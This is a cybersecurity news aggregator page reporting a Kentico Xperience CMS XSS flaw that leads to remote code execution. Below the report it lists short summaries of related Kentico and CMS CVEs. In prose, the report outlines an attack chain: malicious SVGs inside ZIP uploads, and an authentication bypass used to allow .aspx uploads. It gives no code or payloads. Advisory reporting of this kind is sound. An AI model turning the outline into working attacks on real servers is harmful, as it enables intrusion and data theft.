CyberSecurityBoard
Sponsor Register Login

Kentico Xperience CMS XSS Vulnerability Let Attackers Execute Remote Code

Post-Authentication Remote Code Execution (Optional): If attackers gain administrative access through other means (e.g., exploiting authentication bypass vulnerabilities like CVE-2025-2746), they can modify allowed file extensions and upload server-side executable files, such as .aspx, enabling full remote code execution. While it enforces a whitelist of file extensions, it permits SVG files, which can contain embedded JavaScript code. Kentico’s custom file handler processes ZIP files, allowing attackers to extract and execute malicious SVG files stored within. This vulnerability poses severe risks, including unauthorized access to sensitive data, session hijacking, and complete server compromise through remote code execution. Crafting Malicious Files: Attackers create an SVG file containing JavaScript payloads and package it into a ZIP archive.

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 01 Apr 2025 15:10:05 +0000


Cyber News related to Kentico Xperience CMS XSS Vulnerability Let Attackers Execute Remote Code

Kentico Xperience CMS Authentication Bypass Vulnerability Leads to Remote Code Execution - The second bypass exploits a logical flaw in Microsoft’s obsolete Web Services Enhancement 3.0 library, where the system fails to validate tokens with the “SendNone” password option. By manipulating SOAP requests to use password ...
9 months ago Cybersecuritynews.com
Kentico Xperience CMS XSS Vulnerability Let Attackers Execute Remote Code - Post-Authentication Remote Code Execution (Optional): If attackers gain administrative access through other means (e.g., exploiting authentication bypass vulnerabilities like CVE-2025-2746), they can modify allowed file extensions and upload ...
8 months ago Cybersecuritynews.com CVE-2025-2746
CVE-2025-2749 - An authenticated remote code execution in Kentico Xperience allows authenticated users Staging Sync Server to upload arbitrary data to path relative locations. This results in path traversal and arbitrary file upload, including content that can be ...
9 months ago
CVE-2025-2748 - The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178. ...
9 months ago
CVE-2025-2746 - An authentication bypass vulnerability in Kentico Xperience allows authentication bypass via the Staging Sync Server password handling of empty SHA1 usernames in digest authentication. Authentication bypass allows an attacker to control ...
9 months ago
CVE-2025-2747 - An authentication bypass vulnerability in Kentico Xperience allows authentication bypass via the Staging Sync Server component password handling for the server defined None type. Authentication bypass allows an attacker to control administrative ...
9 months ago
CVE-2025-2794 - An unsafe reflection vulnerability in Kentico Xperience allows an unauthenticated attacker to kill the current process, leading to a Denial-of-Service condition. ...
8 months ago
CVE-2020-15247 - October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. In October CMS from version 1.0.319 and before version 1.0.469, an authenticated backend user with the cms.manage_pages, cms.manage_layouts, or ...
4 years ago
Critical Craft CMS RCE 0-Day Vulnerability Exploited in Attacks to Steal Data - According to security researchers at CERT Orange Cyberdefense, a critical remote code execution (RCE) vulnerability in Craft CMS is actively being exploited to breach servers and steal data. If a system is believed to be compromised, administrators ...
8 months ago Cybersecuritynews.com CVE-2024-58136
CVE-2020-26231 - October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. A bypass of CVE-2020-15247 (fixed in 1.0.469 and 1.1.0) was discovered that has the same impact as CVE-2020-15247. An authenticated backend user with the ...
5 years ago
CVE-2021-21264 - October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. A bypass of CVE-2020-26231 (fixed in 1.0.470/471 and 1.1.1) was discovered that has the same impact as CVE-2020-26231 & CVE-2020-15247. An authenticated ...
3 years ago
CVE-2021-43991 - The Kentico Xperience CMS version 13.0 – 13.0.43 is vulnerable to a persistent Cross-Site Scripting (XSS) vulnerability (also known as Stored or Second-Order XSS). Persistent XSS vulnerabilities occur when the application stores and retrieves ...
4 years ago
CVE-2024-54149 - Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Winter CMS prior to versions 1.2.7, 1.1.11, and 1.0.476 allow users with access to the CMS templates sections that modify Twig files to bypass the ...
1 year ago Tenable.com
The Exploration of Static vs Dynamic Code Analysis - Two essential methodologies employed for this purpose are Static Code Analysis and Dynamic Code Analysis. Static Code Analysis involves the examination of source code without its execution. In this exploration of Static vs Dynamic Code Analysis, ...
1 year ago Feeds.dzone.com
CVE-2006-3172 - Multiple PHP remote file inclusion vulnerabilities in Content*Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the (1) lang_path parameter to (a) cms/plugins/col_man/column.inc.php, ...
8 years ago
CVE-2024-12907 - Kentico CMS in version 7 is vulnerable to a Reflected XSS attacks through manipulation of a specific GET request parameter sent to /CMSMessages/AccessDenied.aspx endpoint. Notably, support for this version of Kentico ended in 2016. Version 8 was ...
11 months ago Tenable.com
CVE-2022-50685 - A stored cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via XML file uploads as page attachments or metafiles. Attackers can upload malicious XML files that enable stored XSS, allowing ...
1 week ago
CVE-2024-58321 - A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form validation rule configuration. Attackers can exploit this vulnerability to execute malicious scripts that will run in users' ...
1 week ago
CVE-2024-58319 - A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Pages dashboard widget configuration dialog. Attackers can exploit this vulnerability to execute malicious scripts in ...
1 week ago
CVE-2024-58318 - A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the rich text editor component for page and form builders. Attackers can exploit this vulnerability by entering malicious URIs, ...
1 week ago
CVE-2022-50681 - A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via administration input fields in the Rich text editor component. Attackers can exploit this vulnerability to execute arbitrary scripts ...
1 week ago
CVE-2020-36891 - A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to upload files with spoofed Content-Type that do not match file extensions. Attackers can exploit this vulnerability by uploading malicious files with manipulated MIME ...
1 week ago
CVE-2022-50680 - A stored cross-site scripting vulnerability in Kentico Xperience allows administration users to inject malicious scripts via email marketing templates. Attackers can exploit this vulnerability to execute malicious scripts that could compromise user ...
1 week ago
CVE-2023-53738 - A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via page preview URLs. Attackers can exploit this vulnerability to execute arbitrary scripts in users' browsers during page ...
1 week ago
CVE-2023-53736 - A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts in the administration interface. Attackers can exploit this vulnerability to execute arbitrary scripts within the ...
1 week ago

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)